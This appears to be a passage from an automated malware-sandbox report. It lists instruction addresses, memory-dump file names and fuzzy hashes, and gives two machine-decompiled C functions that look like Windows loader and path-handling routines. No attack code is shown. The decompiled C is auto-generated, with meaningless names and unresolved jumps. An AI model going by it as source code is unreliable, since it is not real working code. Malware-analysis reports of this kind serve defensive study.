0x05466159
0x0546615c
0x05466163
0x05466169
0x0546616c
0x05466172
0x05466181
0x05466186
0x05466187
0x0546618b
0x05466191
0x05466195
0x054661a3
0x054661bb
0x054661c0
0x054661c3
0x054661cc
0x054661d0
0x054661dc
0x054661de
0x054661e1
0x054661e4
0x054661e6
0x054661e8
0x054661e8
0x054661e8
0x054661e8
0x054661e6
0x054661ec
0x054661f3
0x05466203
0x05466209
0x0546620a
0x05466216
0x0546621d
0x05466227
0x05466241
0x05466246
0x0546624c
0x05466257
0x05466259
0x0546625c
0x0546625e
0x05466260
0x05466260
0x05466260
0x05466260
0x0546625e
0x05466264
0x05466267
0x05466269
0x05466315
0x05466315
0x0546631b
0x0546631e
0x05466324
0x05466327
0x0546632f
0x05466330
0x05466333
0x0546633a
0x0546633c
0x05466335
0x05466335
0x05466335
0x0546633f
0x05466342
0x0546634c
0x05466352
0x05466355
0x05466355
0x05466359
0x00000000
0x0546626f
0x05466275
0x05466275
0x05466278
0x0546627e
0x0546627e
0x05466281
0x05466287
0x0546628d
0x05466298
0x0546629c
0x054662a2
0x0546629e
0x0546629e
0x0546629e
0x054662a7
0x054662a7
0x054662aa
0x054662b0
0x054662f0
0x054662f0
0x054662f2
0x054662f8
0x054662fd
0x054662b2
0x054662b2
0x054662b2
0x054662b5
0x054662dd
0x054662e2
0x054662e5
0x054662b7
0x054662b8
0x054662bb
0x054662bd
0x054662c0
0x054662c4
0x054662cd
0x054662cd
0x054662c0
0x054662bb
0x054662b5
0x05466302
0x05466303
0x05466305
0x05466305
0x05466305
0x0546630c
0x0546630c
0x00000000
0x0546627e
0x05466269
0x05465eac
0x05465ebb
0x05465ebe
0x05465ecb
0x05465ecb
0x05465ece
0x05465ece
0x05465ed4
0x05465ed7
0x05465ed9
0x05465edb
0x05465edb
0x05465ee1
0x05465ee1
0x05465ee3
0x05465f20
0x05465f20
0x05465ee5
0x05465ee5
0x05465ee5
0x05465ee8
0x05465f11
0x05465f18
0x05465eea
0x05465eea
0x05465eed
0x05465ef2
0x05465ef8
0x05465efb
0x05465f0a
0x05465f0a
0x05465eed
0x05465ee8
0x05465f22
0x05465f28
0x00000000
0x00000000
0x05465f30
0x05465f31
0x05465f37
0x05465f3a
0x05465f3d
0x05465f44
0x00000000
0x00000000
0x00000000
0x05465f46
0x05465f48
0x05465f4d
0x00000000
0x05465f4d
0x05465dda
0x05465ddf
0x00000000
0x05465ddf
0x05465dd8
0x05465da7
0x05465da9
0x05465dac
0x05465dae
0x00000000
0x05465db4
0x05465db4
0x00000000
0x05465db4
0x05465dae
0x05465d88
0x05465d8d
0x05466363
0x05466369
0x0546636a
0x05466370
0x05466372
0x0546637a
0x0546637b
0x0546637d
0x00000000
0x00000000
0x0546637f
0x05466385
0x00000000
0x05466385
0x05465d38
0x05465d3b
0x00000000
0x00000000
0x00000000
0x05465d3b
0x05465d27
0x05465d29
0x00000000
0x00000000
0x00000000
0x05466360
0x00000000
0x05466360
0x05465c10
0x05465c10
0x054663da
0x054663e5
0x054663e5

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44c2ec4a2066f63d573de798072c54a4ec90995a57e226771eaadc934c5f8eb4
Instruction ID: f4b6a5a9024eafa1ded950b129faa026e31b7c73390f74616621ce2462d75f32
Opcode Fuzzy Hash: 44c2ec4a2066f63d573de798072c54a4ec90995a57e226771eaadc934c5f8eb4
Instruction Fuzzy Hash: 06423775A042298FDB24CF68C880BEAB7B2FF49304F1581EAD949AB342D7749985CF51

Uniqueness

Uniqueness Score: -1.00%

Function 053B4120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E053B4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x548d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E053CF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E053B6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L053B4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E053B6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M053B45F8))) {
												case 0:
													_v568 = 0x5371078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x53711c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L053B4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E053DF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E053DF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E053952A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E053AEB70(1, 0x54879a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E053AAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E053D95D0();
																			L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E053DB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E053D3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E053DB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x053b4128
0x053b4135
0x053b413c
0x053b4141
0x053b4145
0x053b4147
0x053b414e
0x053b4151
0x053b4159
0x053b415c
0x053b4160
0x053b4164
0x053b4168
0x053b416c
0x053b417f
0x053b4181
0x053b446a
0x053b446a
0x053b418c
0x053b4195
0x053b4199
0x053b4432
0x053b4439
0x053b443d
0x053b4442
0x053b4447
0x00000000
0x053b419f
0x053b41a3
0x053b41b1
0x053b41b9
0x053b41bd
0x053b45db
0x053b45db
0x00000000
0x053b41c3
0x053b41c3
0x053b41ce
0x053b41d4
0x053fe138
0x053fe13e
0x053fe169
0x053fe16d
0x053fe19e
0x053fe16f
0x053fe16f
0x053fe175
0x053fe179
0x053fe18f
0x053fe193
0x00000000
0x053fe199
0x00000000
0x053fe199
0x053fe193
0x00000000
0x00000000
0x00000000
0x053b41da
0x053b41da
0x053b41df
0x053b41e4
0x053b41ec
0x053b4203
0x053b4207
0x053fe1fd
0x053b4222
0x053b4226
0x053fe1f3
0x053fe1f3
0x053b422c
0x053b422c
0x053b4233
0x053fe1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x053b4239
0x053b4239
0x053b4239
0x053b4239
0x053b4233
0x053b4226
0x053b41ee
0x053b41ee
0x053b41f4
0x053b4575
0x053fe1b1
0x053fe1b1
0x00000000
0x053b457b
0x053b457b
0x053b4582
0x053fe1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x053b4588
0x053b4588
0x053b458c
0x053fe1c4
0x053fe1c4
0x00000000
0x053b4592
0x053b4592
0x053b4599
0x053fe1be
0x00000000
0x00000000
0x00000000
0x00000000
0x053b459f
0x053b459f
0x053b45a3
0x053fe1d7
0x053fe1e4
0x00000000
0x053b45a9
0x053b45a9
0x053b45b0
0x053fe1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x053b45b6
0x053b45b6
0x053b45b6
0x00000000
0x053b45b6
0x053b45b0
0x053b45a3
0x053b4599
0x053b458c
0x053b4582
0x00000000
0x00000000
0x00000000
0x00000000
0x053b41f4
0x053b423e
0x053b4241
0x053b45c0
0x053b45c4
0x00000000
0x053b45ca
0x053b45ca
0x00000000
0x053fe207
0x053fe20f
0x00000000
0x00000000
0x00000000
0x00000000
0x053b45d1
0x00000000
0x00000000
0x053b45ca
0x00000000
0x053b4247
0x053b4247
0x053b4247
0x053b4249
0x053b4249
0x053b4249
0x053b4251
0x053b4251
0x053b4257
0x053b425f
0x053b426e
0x053b4270
0x053b427a
0x053fe219
0x053fe219
0x053b4280
0x053b4282
0x053b4456
0x053b45ea
0x00000000
0x053b45f0
0x053fe223
0x00000000
0x053fe223
0x053b445c
0x053b445c
0x00000000
0x053b445c
0x00000000
0x053b4288
0x053b428c
0x053fe298
0x053b4292
0x053b4292
0x053b429e
0x053b42a3
0x053b42a7
0x053b42ac
0x053fe22d
0x053b42b2
0x053b42b2
0x053b42b9
0x053b42bc
0x053b42c2
0x053b42ca
0x053b42cd
0x053b42cd
0x053b42d4
0x053b433f
0x053b433f
0x053b42d6
0x053b42d6
0x053b42d9
0x053b42dd
0x053b42eb
0x053fe23a
0x053b42f1
0x053b4305
0x053b430d
0x053b4315
0x053b4318
0x053b431f
0x053b4322
0x053b432e
0x053b433b
0x053b433b
0x00000000
0x053b432e
0x053b42eb
0x053b434c
0x053b434e
0x053b4352
0x053b4359
0x053b435e
0x053b4361
0x053b436e
0x053b438a
0x053b438e
0x053b4396
0x053b439e
0x053b43a1
0x053b43ad
0x053b43bb
0x053b43bb
0x053b43ad
0x053b436e
0x053b43bf
0x053b43c5
0x053b4463
0x053b4463
0x053b43ce
0x053b43d5
0x053b43d9
0x053b43df
0x053b4475
0x053b4479
0x053b4491
0x053b4491
0x053b4479
0x053b43e5
0x053b43eb
0x053b43f4
0x053b43f6
0x053b43f9
0x053b43fc
0x053b43ff
0x053b44e8
0x053b44ed
0x053b44f3
0x053fe247
0x00000000
0x053b44f9
0x053b4504
0x053b4508
0x053b450f
0x053fe269
0x00000000
0x053b4515
0x053b4519
0x053b4531
0x053b4534
0x053b4537
0x053b453e
0x053b4541
0x053b454a
0x053fe255
0x053fe255
0x053fe25b
0x053fe25e
0x053fe261
0x053fe261
0x053b4555
0x053b4559
0x053b455d
0x053fe26d
0x053fe270
0x053fe274
0x053fe27a
0x053fe27d
0x053fe28e
0x053fe28e
0x053b4563
0x053b4563
0x053b4569
0x053b4569
0x00000000
0x053b455d
0x053b450f
0x00000000
0x053b44f3
0x053b43ff
0x053b4405
0x053b4405
0x053b4405
0x053b42ac
0x053b428c
0x053b4282
0x053b4407
0x053b440d
0x053fe2af
0x053fe2af
0x053b4413
0x053b4413
0x00000000
0x053b41d4
0x00000000
0x053b41c3
0x053b41bd
0x053b4415
0x053b4415
0x053b4416
0x053b4417
0x053b4429
0x053b416e
0x053b416e
0x053b4175
0x053b4498
0x053b449f
0x053fe12d
0x00000000
0x053fe133
0x00000000
0x053fe133
0x053b44a5
0x053b44a5
0x053b44aa
0x00000000
0x053b44bb
0x053b44ca
0x053b44d6
0x053b44d7
0x053b44d8
0x053b44e3
0x053b44e3
0x053b44aa
0x053b417b
0x053b417b
0x053b417b
0x00000000
0x053b417b
0x053b4175
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78181b8624a9f702ddda0cde6eee25c6f478890d2a2c10a34b50bd2dc490a418
Instruction ID: 90846f508b812282bf74d6a3783b93aa2f78a9acfc75f21467e863b58054fcce
Opcode Fuzzy Hash: 78181b8624a9f702ddda0cde6eee25c6f478890d2a2c10a34b50bd2dc490a418
Instruction Fuzzy Hash: D6F1B0706082118FDB14CF19C480A7AB7E7FF88704F04492EF686CBA61E7B4D991DB56

Uniqueness

Uniqueness Score: -1.00%

Function 053AD5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E053AD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x548d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E053A6600(0x54852d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x5487b9c; // 0x0
							_t281 = L053B4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E053DF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x5487b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x5487b8c; // 0x32f29e0
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E053B2280(_t200, 0x54884d8);
									_t277 =  *0x54885f4; // 0x32f3a98
									_t351 =  *0x54885f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x32f3a30
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E053AFFB0(_t287, _t353, 0x54884d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E053ECC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E053A6600(0x54852d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E053A7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x548b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0541E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x5488472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x548b218; // 0x0
														asm("ror edi, cl");
														 *0x548b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E053B2280(_t250, 0x54884d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L053D3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E053AFFB0(_t293, _t353, 0x54884d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E053D37F5(_t353, 0);
																}
																E053D0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E053C9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E053C02D6(_t174);
																}
																L053B77F0( *0x5487b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E053CC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L053AEC7F(_t353);
										L053C19B8(_t287, 0, _t353, 0);
